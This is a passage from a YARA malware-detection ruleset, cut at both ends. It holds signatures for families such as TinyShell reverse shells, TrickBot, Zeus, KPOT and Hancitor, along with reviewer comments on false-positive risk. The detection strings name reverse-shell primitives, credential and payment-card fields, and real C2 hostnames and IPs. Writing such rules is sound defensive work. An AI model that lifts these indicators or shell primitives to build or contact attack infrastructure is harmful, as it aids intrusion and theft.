        $vard03 = { 66 89 05 7D 5E 00 00 } // can be added
    condition:
        1 of them
}

// libc symbol names a PTY-backed reverse shell needs ($vare*), plus the environment
// variables it unsets and the shell path ($varc*). Five of the symbols, or two of the
// $varc strings, are enough — the symbol set alone appears in plenty of legitimate
// terminal software, so hits on priv02 by itself are not conclusive.
private rule priv02
{
    meta:
        date = "2018-02-10"
        author = "@unixfreaxjp"
    strings:
        $vare01 = "socket" fullword nocase wide ascii
        $vare02 = "connect" fullword nocase wide ascii
        $vare03 = "alarm" fullword nocase wide ascii
        $vare04 = "dup2" fullword nocase wide ascii
        $vare05 = "execl" fullword nocase wide ascii
        $vare06 = "openpty" fullword nocase wide ascii
        $vare07 = "putenv" fullword nocase wide ascii
        $vare08 = "setsid" fullword nocase wide ascii
        $vare09 = "ttyname" fullword nocase wide ascii
        $vare00 = "waitpid" fullword nocase wide ascii
        $varc01 = "HISTFIL" fullword nocase wide ascii
        $varc02 = "TERML" fullword nocase wide ascii
        $varc03 = "/bin/sh" fullword nocase wide ascii
    condition:
        (5 of ($vare*) or (2 of ($varc*)))
}

// Strictest combination: Mach-O + every private rule, under 100KB.
rule MALW_TinyShell_backconnect_OSX
{
    meta:
        date = "2018-02-10"
        author = "@unixfreaxjp"
    condition:
        is__osx and priv01 and priv02 and priv03 and priv04 and filesize < 100KB
}

// ELF: usage strings plus any one of the symbol/code rules, under 100KB.
rule MALW_TinyShell_backconnect_ELF
{
    meta:
        date = "2018-02-10"
        author = "@unixfreaxjp"
    condition:
        is__elf and priv01 and ((priv02) or ((priv03) or (priv04))) and filesize < 100KB
}

// Either format: usage strings plus symbols, under 100KB.
rule MALW_TinyShell_backconnect_Gen
{
    meta:
        date = "2018-02-11"
        author = "@unixfreaxjp"
    condition:
        ((is__elf) or (is__osx)) and priv01 and priv02 and filesize < 100KB
}

// Loosest rule: usage strings only, on files larger than 20KB (note: a lower bound,
// the opposite of the other three). Treat hits as leads to confirm, not verdicts.
rule MALW_TinyShell_backdoor_Gen
{
    meta:
        date = "2018-02-11"
        author = "@unixfreaxjp"
    condition:
        ((is__elf) or (is__osx)) and priv01 and filesize > 20KB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Linux/Torte: ELF header (is__elf is a private rule defined earlier in this ruleset),
// two hard-coded User-Agent strings, the session query parameters, a fixed hex token,
// the base64 alphabet and several mangled libstdc++ symbols. All twelve strings are
// required, so this is tight and build-specific; a recompiled variant may miss on the
// mangled names.
rule ELF_Linux_Torte : Linux ELF
{
    meta:
        author = "@mmorenog,@yararules"
        description = "Detects ELF Linux/Torte infection"
        ref = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
        hash1 = "1faf27f6b8e8a9cadb611f668a01cf73"
        hash2 = "cb0477445fef9c5f1a5b6689bbfb941e"
    strings:
        $s0 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)"
        $s1 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
        $s2 = "?sessd="
        $s3 = "&sessc="
        $s4 = "&sessk="
        $s5 = "3a08fe7b8c4da6ed09f21c3ef97efce2"
        $s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
        $s7 = "_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE"
        $s8 = "_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4"
        $s9 = "_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm"
        $s10 = "_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1_"
        $s11 = "_ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4"
    condition:
        is__elf and all of ($s*)
}

// Torte C2 hostnames. Any one hit fires and there is no file-type guard, so this also
// matches proxy logs, packet captures or memory containing these names — useful for
// hunting, but confirm the context before treating a hit as an infected binary.
rule ELF_Linux_Torte_domains
{
    meta:
        author = "@mmorenog,@yararules"
        description = "Detects ELF Linux/Torte infection"
        ref1 = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
    strings:
        $1 = "pages.touchpadz.com" ascii wide nocase
        $2 = "bat.touchpadz.com" ascii wide nocase
        $3 = "stat.touchpadz.com" ascii wide nocase
        $4 = "sk2.touchpadz.com" ascii wide nocase
    condition:
        any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
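*/

// TreasureHunt POS malware: PDB name, a Java-updater-lookalike string and a decrypted
// command-line marker; all three required.
rule TreasureHunt
{
    meta:
        author = "Minerva Labs"
        ref ="http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed"
        date = "2016/06"
        maltype = "Point of Sale (POS) Malware"
        filetype = "exe"
    strings:
        $a = "treasureHunter.pdb"
        $b = "jucheck"
        $c = "cmdLineDecrypted"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// TrickBot core: the module-interface names. "Start", "Control", "Release" and
// "FreeBuffer" are ordinary identifiers; only "moduleconfig" is distinctive, and all
// five are required. Expect occasional benign hits on unrelated binaries.
rule MALW_trickbot_bankBot : Trojan
{
    meta:
        author = "Marc Salinas @Bondey_m"
        description = "Detects Trickbot Banking Trojan"
    strings:
        $str_trick_01 = "moduleconfig"
        $str_trick_02 = "Start"
        $str_trick_03 = "Control"
        $str_trick_04 = "FreeBuffer"
        $str_trick_05 = "Release"
    condition:
        all of ($str_trick_*)
}

// TrickBot systeminfo module: XML report tags and the module's PDB name; all required.
rule MALW_systeminfo_trickbot_module : Trojan
{
    meta:
        author = "Marc Salinas @Bondey_m"
        description = "Detects systeminfo module from Trickbot Trojan"
    strings:
        $str_systeminf_01 = "<program>"
        $str_systeminf_02 = "<service>"
        $str_systeminf_03 = "</systeminfo>"
        $str_systeminf_04 = "GetSystemInfo.pdb"
        $str_systeminf_05 = "</autostart>"
        $str_systeminf_06 = "</moduleconfig>"
    condition:
        all of ($str_systeminf_*)
}

// TrickBot dllinject (web-inject) module: Firefox prefs hook and inject-config tags.
rule MALW_dllinject_trickbot_module : Trojan
{
    meta:
        author = "Marc Salinas @Bondey_m"
        description = " Detects dllinject module from Trickbot Trojan"
    strings:
        $str_dllinj_01 = "user_pref("
        $str_dllinj_02 = "<ignore_mask>"
        $str_dllinj_03 = "<require_header>"
        $str_dllinj_04 = "</dinj>"
    condition:
        all of ($str_dllinj_*)
}

// TrickBot mailsearcher module. Apart from "mailsearcher" and "mailconf" these are
// very short, common words ("handler", "conf", "ctl", "file"); the all-of condition
// limits but does not remove the false-positive risk.
rule MALW_mailsercher_trickbot_module : Trojan
{
    meta:
        author = "Marc Salinas @Bondey_m"
        description = " Detects mailsearcher module from Trickbot Trojan"
    strings:
        $str_mails_01 = "mailsearcher"
        $str_mails_02 = "handler"
        $str_mails_03 = "conf"
        $str_mails_04 = "ctl"
        $str_mails_05 = "SetConf"
        $str_mails_06 = "file"
        $str_mails_07 = "needinfo"
        $str_mails_08 = "mailconf"
    condition:
        all of ($str_mails_*)
}

// TrumpBot: a fixed token plus the hard-coded C2 IP; both required. The IP is a
// point-in-time indicator and will age.
rule TrumpBot : MALW
{
    meta:
        description = "TrumpBot"
        author = "Joan Soriano / @joanbtl"
        date = "2017-04-16"
        version = "1.0"
        MD5 = "77122e0e6fcf18df9572d80c4eedd88d"
        SHA1 = "108ee460d4c11ea373b7bba92086dd8023c0654f"
    strings:
        $string = "trumpisdaddy"
        $ip = "198.50.154.188"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
Yara Rule Set
Author: Florian Roth
Date: 2015-10-13
Identifier: Upatre Campaign October 2015
*/

// Upatre downloader (Oct 2015 campaign). MZ header, under 1500KB, "barcod" within the
// first 4000 bytes, and every $s* string. Note $s6 duplicates $s2 ("glmf32.dll"), so
// "all of ($s*)" effectively needs six distinct strings, not seven.
rule Upatre_Hazgurut
{
    meta:
        description = "Detects Upatre malware - file hazgurut.exe"
        author = "Florian Roth"
        reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
        date = "2015-10-13"
        score = 70
        hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
        hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
        hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
        hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
        hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
        hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
        hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
        hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
        hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
        hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
        hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
        hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
        hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
        hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
    strings:
        $a1 = "barcod" fullword ascii
        $s0 = "msports.dll" fullword ascii
        $s1 = "nddeapi.dll" fullword ascii
        $s2 = "glmf32.dll" fullword ascii
        // requests elevation in the embedded manifest
        $s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
        $s4 = "cmutil.dll" fullword ascii
        $s5 = "mprapi.dll" fullword ascii
        $s6 = "glmf32.dll" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1500KB and $a1 in (0..4000) and all of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// "pe" is imported but unused by the rules below.
import "pe"

// Urausy (skype.dat) memory rule: both file names plus either the window pair or the
// desktop pair. "CreateWindow" / "CreateDesktop" are ordinary API names; the paired
// custom strings ("YIWEFHIWQ", "MyDesktop") carry the specificity.
rule urausy_skype_dat : memory
{
    meta:
        author = "AlienVault Labs"
        description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
    strings:
        $a = "skype.dat" ascii wide
        $b = "skype.ini" ascii wide
        $win1 = "CreateWindow"
        $win2 = "YIWEFHIWQ" ascii wide
        $desk1 = "CreateDesktop"
        $desk2 = "MyDesktop" ascii wide
    condition:
        $a and $b and (all of ($win*) or all of ($desk*))
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Vidgrab (Citizen Lab) code tricks: a deliberate divide-by-zero, an XOR loop whose key
// byte is 0x66 or 0x58, and a junk sequence. All three required.
rule VidgrabCode : Vidgrab Family
{
    meta:
        description = "Vidgrab code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-20"
    strings:
        $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
        // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
        $xorloop = { 03 C1 80 30 (66 | 58) 41 }
        $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
    condition:
        all of them
}

// Vidgrab strings: three of six. "IDI_ICON5" and "Software\\rar" are weak on their own.
rule VidgrabStrings : Vidgrab Family
{
    meta:
        description = "Vidgrab Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-20"
    strings:
        $ = "IDI_ICON5" wide ascii
        $ = "starter.exe"
        $ = "wmifw.exe"
        $ = "Software\\rar"
        $ = "tmp092.tmp"
        $ = "temp1.exe"
    condition:
        3 of them
}

// Family wrapper: code tricks OR strings.
rule Vidgrab : Family
{
    meta:
        description = "Vidgrab"
        author = "Seth Hardy"
        last_modified = "2014-06-20"
    condition:
        VidgrabCode or VidgrabStrings
}

// Virut file infector: infection stub signature plus one routine from the virus body.
// Meta fixes: the date key was misspelled "data", and the third sample hash reused the
// key "infected_sample2"; it is now "infected_sample3" so all three hashes are visible
// under distinct keys in `yara -m` output.
rule VirutFileInfector
{
    meta:
        author = "D00RT <@D00RT_RM>"
        date = "2017/08/04"
        description = "Virut (unknown version) fileinfector detection"
        reference = "http://reversingminds-blog.logdown.com"
        infected_sample1 = "5755f09d445a5dcab3ea92d978c7c360"
        infected_sample2 = "68e508108ed94c8c391c70ef1d15e0f8"
        infected_sample3 = "2766e8e78ee10264cf1a3f5f4a16ff00"
    strings:
        // stc; call +0x22; <one masked byte>; xor ebx,ebp; push esi
        $sign = { F9 E8 22 00 00 00 ?? 31 EB 56 }
        $func = { 52 C1 E9 1D 68 31 D4 00 00 58 5A 81 C1 94 01 00 00 80 4D 00 F0 89 6C 24 04 F7 D1 81 6C 24 04 }
    condition:
        $sign and $func
}

// Volgmer (HIDDEN COBRA): the misspelled "Mozillar/" User-Agent in a valid PE.
// uint16(uint32(0x3c)) reads the "PE" signature at e_lfanew, so the file must have
// both the MZ stub and a PE header — plain text files containing the string are excluded.
rule volgmer
{
    meta:
        description = "Malformed User Agent"
        ref = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
    strings:
        $s = "Mozillar/"
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $s
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Wabot IRC worm: the hex strings are ASCII "C:\marijuana.txt" and "sIRC4"; both required.
rule Wabot : Worm
{
    meta:
        author="Kevin Falcoz"
        date="14/08/2015"
        description="Wabot Trojan Worm"
    strings:
        $signature1={43 3A 5C 6D 61 72 69 6A 75 61 6E 61 2E 74 78 74}
        $signature2={73 49 52 43 34}
    condition:
        $signature1 and $signature2
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.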
*/

// "pe" is imported several times in this stretch; none of the rules below use it.
import "pe"

// Warp (Citizen Lab) code feature: cmp/jne/mov sequence that rewrites '+' (2B) to '-'
// (2D) and '/' (2F) to '_' (5F) in place — consistent with converting standard base64
// output to the URL-safe alphabet.
rule WarpCode : Warp Family
{
    meta:
        description = "Warp code features"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    strings:
        // character replacement
        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
    condition:
        any of them
}

// Warp strings: a C2 URI fragment, a short token ("wyle" — weak alone) and a file name.
rule WarpStrings : Warp Family
{
    meta:
        description = "Warp Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    strings:
        $ = "/2011/n325423.shtml?"
        $ = "wyle"
        $ = "\\~ISUN32.EXE"
    condition:
        any of them
}

// Family wrapper: code OR strings.
rule Warp : Family
{
    meta:
        description = "Warp"
        author = "Seth Hardy"
        last_modified = "2014-07-10"
    condition:
        WarpCode or WarpStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Wimmie (Citizen Lab) shellcode: the XOR decryption loop (dec ecx; xor [ecx+edi],esp;
// cmp ecx,0; ja) either with its fixed lea/mov setup or preceded by a specific counter
// load (B9 B4 1D 00 00 = mov ecx,0x1DB4) and 8 wildcard bytes.
rule WimmieShellcode : Wimmie Family
{
    meta:
        description = "Wimmie code features"
        author = "Seth Hardy"
        last_modified = "2014-07-17"
    strings:
        // decryption loop
        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
    condition:
        any of them
}

// Wimmie strings, including the sysprep\cryptbase.dll path used for the UAC-bypass
// side-load technique. Any single string fires.
rule WimmieStrings : Wimmie Family
{
    meta:
        description = "Strings used by Wimmie"
        author = "Seth Hardy"
        last_modified = "2014-07-17"
    strings:
        $ = "\x00ScriptMan"
        $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
        $ = "ProbeScriptFint" wide ascii
        $ = "ProbeScriptKids" wide ascii
        $ = "ProbeScriptKids"
    condition:
        any of them
}

// Family wrapper: shellcode OR strings.
rule Wimmie : Family
{
    meta:
        description = "Wimmie family"
        author = "Seth Hardy"
        last_modified = "2014-07-17"
    condition:
        WimmieShellcode or WimmieStrings
}

// XHide process-name faker (Linux hacktool): its banner and log format string.
// NOTE(review): the value under the "SHA256" meta key is 40 hex digits, which is the
// length of a SHA-1, not a SHA-256 — verify the key/value against the source before
// relying on it for lookups.
rule XHide: MALW
{
    meta:
        description = "XHide - Process Faker"
        author = "Joan Soriano / @w0lfvan"
        date = "2017-12-01"
        version = "1.0"
        MD5 = "c644c04bce21dacdeb1e6c14c081e359"
        SHA256 = "59f5b21ef8a570c02453b5edb0e750a42a1382f6"
    strings:
        $a = "XHide - Process Faker"
        $b = "Fakename: %s PidNum: %d"
    condition:
        all of them
}

// Matches the "stratum+tcp" mining-pool URL scheme anywhere. This hits legitimate
// XMRig / other miner builds and their configs just as well as malicious ones —
// it flags mining software, not malware; policy and context decide what a hit means.
rule XMRIG_Miner
{
    meta:
        ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
    strings:
        $a1 = "stratum+tcp"
    condition:
        $a1
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// XOR.DDoS (Linux): the fixed key-like token, config keys and two function names.
// All seven required.
rule XOR_DDosv1 : DDoS
{
    meta:
        author = "Akamai CSIRT"
        description = "Rule to detect XOR DDos infection"
    strings:
        $st0 = "BB2FA36AAA9541F0"
        $st1 = "md5="
        $st2 = "denyip="
        $st3 = "filename="
        $st4 = "rmfile="
        $st5 = "exec_packet"
        $st6 = "build_iphdr"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Yayih (Citizen Lab) encryption loop: add 0x7A to a byte, xor with 0x19, advance,
// compare against a length.
rule YayihCode : Yayih Family
{
    meta:
        description = "Yayih code features"
        author = "Seth Hardy"
        last_modified = "2014-07-11"
    strings:
        // encryption
        $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
    condition:
        any of them
}

// Yayih strings: C2 path, dropped file names and the config INI. Any one fires.
rule YayihStrings : Yayih Family
{
    meta:
        description = "Yayih Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-11"
    strings:
        $ = "/bbs/info.asp"
        $ = "\\msinfo.exe"
        $ = "%s\\%srcs.pdf"
        $ = "\\aumLib.ini"
    condition:
        any of them
}

// Family wrapper: code OR strings.
rule Yayih : Family
{
    meta:
        description = "Yayih"
        author = "Seth Hardy"
        last_modified = "2014-07-11"
    condition:
        YayihCode or YayihStrings
}

// Yordanyan ActiveAgent, memory rule: status/log messages and beacon parameter names;
// 15 of 27 required.
// NOTE(review): the original comment below says the wide strings are 16-bit
// big-endian, but YARA's `wide` modifier matches UTF-16LE (char byte followed by
// 0x00). If the in-memory strings really are big-endian these `wide` strings would
// not match — verify against a memory sample.
rule yordanyan_activeagent
{
    meta:
        description = "Memory string yara for Yordanyan ActiveAgent"
        author = "J from THL <j@techhelplist.com>"
        reference1 = "https://www.virustotal.com/#/file/a2e34bfd5a9789837bc2d580e87ec11b9f29c4a50296ef45b06e3895ff399746/detection"
        reference2 = "ETPRO TROJAN Win32.ActiveAgent CnC Create"
        date = "2018-10-04"
        maltype = "Botnet"
        filetype = "memory"
    strings:
        // the wide strings are 16bit bigendian strings in memory. strings -e b memdump.file
        $s01 = "I'm KeepRunner!" wide
        $s02 = "I'm Updater!" wide
        $s03 = "Starting Download..." wide
        $s04 = "Download Complete!" wide
        $s05 = "Running New Agent and terminating updater!" wide
        $s06 = "Can't Run downloaded file!" wide
        $s07 = "Retrying download and run!" wide
        $s08 = "Can't init Client." wide
        $s09 = "Client initialised -" wide
        $s10 = "Client not found!" wide
        $s11 = "Client signed." wide
        $s12 = "GetClientData" wide
        $s13 = "&counter=" wide
        $s14 = "&agent_file_version=" wide
        $s15 = "&agent_id=" wide
        $s16 = "mac_address=" wide
        $s17 = "Getting Attachments" wide
        $s18 = "public_name" wide
        $s19 = "Yor agent id =" wide
        $s20 = "Yor agent version =" wide
        $s21 = "Last agent version =" wide
        $s22 = "Agent is last version." wide
        $s23 = "Updating Agent" wide
        $s24 = "Terminating RunKeeper" wide
        $s25 = "Terminating RunKeeper: Done" wide
        $s26 = "ActiveAgent" ascii
        $s27 = "public_name" ascii
    condition:
        15 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Zegost trojan: $signature1 is the ASCII text "9/f30Li5ubO5DNADDxG8s762tqY=" (a
// base64-looking blob); $signature2 is a short binary sequence ending in ASCII "Bome".
// Both required.
rule Zegost : Trojan
{
    meta:
        author="Kevin Falcoz"
        date="10/06/2013"
        description="Zegost Trojan"
    strings:
        $signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
        $signature2={00 BA DA 22 51 42 6F 6D 65 00}
    condition:
        $signature1 and $signature2
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// "pe" is imported but unused by the rules below.
import "pe"

// Zeus 1.1.3.4: MZ at offset 0, all three "X_*:" protocol headers, and either an
// API name or the hard-coded User-Agent. The $stringR* alternatives are generic; the
// protocol headers carry the specificity.
rule Windows_Malware_Zeus : Zeus_1134
{
    meta:
        author = "Xylitol xylitol@malwareint.com"
        date = "2014-03-03"
        description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
        reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
    strings:
        $mz = {4D 5A}
        $protocol1 = "X_ID: "
        $protocol2 = "X_OS: "
        $protocol3 = "X_BV: "
        $stringR1 = "InitializeSecurityDescriptor"
        $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
    condition:
        ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
}

// Adwind Java RAT: a ZIP/JAR ("PK" at offset 0) containing a manifest and an
// obfuscated inner-class name of the form Main$Qnnnn.
rule Adwind
{
    meta:
        author="Asaf Aprozper, asafa AT minerva-labs.com"
        description = "Adwind RAT"
        reference = "https://minerva-labs.com/post/adwind-and-other-evasive-java-rats"
        last_modified = "2017-06-25"
    strings:
        $a0 = "META-INF/MANIFEST.MF"
        $a1 = /Main(\$)Q[0-9][0-9][0-9][0-9]/
        $PK = "PK"
    condition:
        $PK at 0 and $a0 and $a1
}

// Hancitor, memory rule: the check-in POST body. Either five of the individual
// parameter names or the complete format string $g. The individual names ("GUID=",
// "&IP=") are generic, which is why five are required.
rule hancitor
{
    meta:
        description = "Memory string yara for Hancitor"
        author = "J from THL <j@techhelplist.com>"
        reference1 = "https://researchcenter.paloaltonetworks.com/2018/02/threat-brief-hancitor-actors/"
        reference2 = "https://www.virustotal.com/#/file/43e17f30b78c085e9bda8cadf5063cd5cec9edaa7441594ba1fe51391cc1c486/"
        reference3 = "https://www.virustotal.com/#/file/d135f03b9fdc709651ac9d0264e155c5580b072577a8ff24c90183b126b5e12a/"
        date = "2018-09-18"
        maltype1 = "Botnet"
        filetype = "memory"
    strings:
        $a = "GUID=" ascii
        $b = "&BUILD=" ascii
        $c = "&INFO=" ascii
        $d = "&IP=" ascii
        $e = "&TYPE=" ascii
        $f = "php|http" ascii
        $g = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d" ascii fullword
    condition:
        5 of ($a,$b,$c,$d,$e,$f) or $g
}

// Kerberos credential (.kirbi) file as written by mimikatz: the DER prefix of a
// KRB-CRED — APPLICATION 22 (0x76), SEQUENCE, [0] INTEGER 5 (pvno), [1] INTEGER 22
// (msg-type). $asn1 uses 2-byte lengths (0x82), $asn1_84 the 4-byte long form (0x84).
// Anchored at offset 0, so it is a file-format match: finding one of these on disk is
// the indicator, regardless of which tool produced it.
rule mimikatz_kirbi_ticket
{
    meta:
        description = "KiRBi ticket for mimikatz"
        author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
    strings:
        $asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
        $asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 }
    condition:
        $asn1 at 0 or $asn1_84 at 0
}

// KPOT stealer, memory rule: check-in parameters, system-info report lines and the
// browser credential / payment-card field names it harvests. 16 of 22 required.
rule kpot
{
    meta:
        author = " J from THL <j@techhelplist.com>"
        date = "2018-08-29"
        reference1 = "https://www.virustotal.com/#/file/4e87a0794bf73d06ac1ce4a37e33eb832ff4c89fb9e4266490c7cef9229d27a7/detection"
        reference2 = "ETPRO TROJAN KPOT Stealer Check-In [2832358]"
        reference3 = "ETPRO TROJAN KPOT Stealer Exfiltration [2832359]"
        version = 1
        maltype = "Stealer"
        filetype = "memory"
    strings:
        $text01 = "bot_id=%s"
        $text02 = "x64=%d"
        $text03 = "is_admin=%d"
        $text04 = "IL=%d"
        $text05 = "os_version=%d"
        $text06 = "IP: %S"
        $text07 = "MachineGuid: %s"
        $text08 = "CPU: %S (%d cores)"
        $text09 = "RAM: %S MB"
        $text10 = "Screen: %dx%d"
        $text11 = "PC: %s"
        $text12 = "User: %s"
        $text13 = "LT: %S (UTC+%d:%d)"
        $text14 = "%s/%s.php"
        $text15 = "Host: %s"
        $text16 = "username_value"
        $text17 = "password_value"
        $text18 = "name_on_card"
        $text19 = "last_four"
        $text20 = "exp_month"
        $text21 = "exp_year"
        $text22 = "bank_name"
    condition:
        16 of them
}

// Marap downloader, memory rule: UTF-16LE format strings used for the MAC address,
// module reports and pipe-delimited beacons. 7 of 11 required; several ("%s %s",
// "pid=%d", "%llx") are generic, so the count matters.
rule marap
{
    meta:
        author = " J from THL <j@techhelplist.com>"
        date = "2018-08-19"
        reference1 = "https://www.virustotal.com/#/file/61dfc4d535d86359c2f09dbdd8f14c0a2e6367e5bb7377812f323a94d32341ba/detection"
        reference2 = "https://www.virustotal.com/#/file/c0c85f93a4f425a23c2659dce11e3b1c8b9353b566751b32fcb76b3d8b723b94/detection"
        reference3 = "https://threatpost.com/highly-flexible-marap-malware-enters-the-financial-scene/136623/"
        reference4 = "https://www.bleepingcomputer.com/news/security/necurs-botnet-pushing-new-marap-malware/"
        version = 1
        maltype = "Downloader"
        filetype = "memory"
    strings:
        $text01 = "%02X-%02X-%02X-%02X-%02X-%02X" wide
        $text02 = "%s, base=0x%p" wide
        $text03 = "pid=%d" wide
        $text04 = "%s %s" wide
        $text05 = "%d|%d|%s|%s|%s" wide
        $text06 = "%s|1|%d|%d|%d|%d|%d|%s" wide
        $text07 = "%d#%s#%s#%s#%d#%s#%s#%d#%s#%s#%s#%s#%d" wide
        $text08 = "%s|1|%d|%d|%d|%d|%d|%s#%s#%s#%s#%d#%d#%d" wide
        $text09 = "%s|0|%d" wide
        $text10 = "%llx" wide
        $text11 = "%s -a" wide
    condition:
        7 of them
}

// Shifu/Shiz banker, memory rule: bot commands, target-process lists, keylog/password
// file names and form-grab parameters.
// NOTE: this rule's string list and condition continue beyond this chunk.
rule shifu_shiz
{
    meta:
        description = "Memory string yara for Shifu/Shiz"
        author = "J from THL <j@techhelplist.com>"
        reference1 = "https://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/"
        reference2 = "https://beta.virusbay.io/sample/browse/24a6dfaa98012a839658c143475a1e46"
        reference3 = "https://raw.githubusercontent.com/Neo23x0/signature-base/master/yara/crime_shifu_trojan.yar"
        date = "2018-03-16"
        maltype1 = "Banker"
        maltype2 = "Keylogger"
        maltype3 = "Stealer"
        filetype = "memory"
    strings:
        $aa = "auth_loginByPassword" fullword ascii
        $ab = "back_command" fullword ascii
        $ac = "back_custom1" fullword ascii
        $ad = "GetClipboardData" fullword ascii
        $ae = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe" fullword ascii
        $af = "mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe" fullword ascii
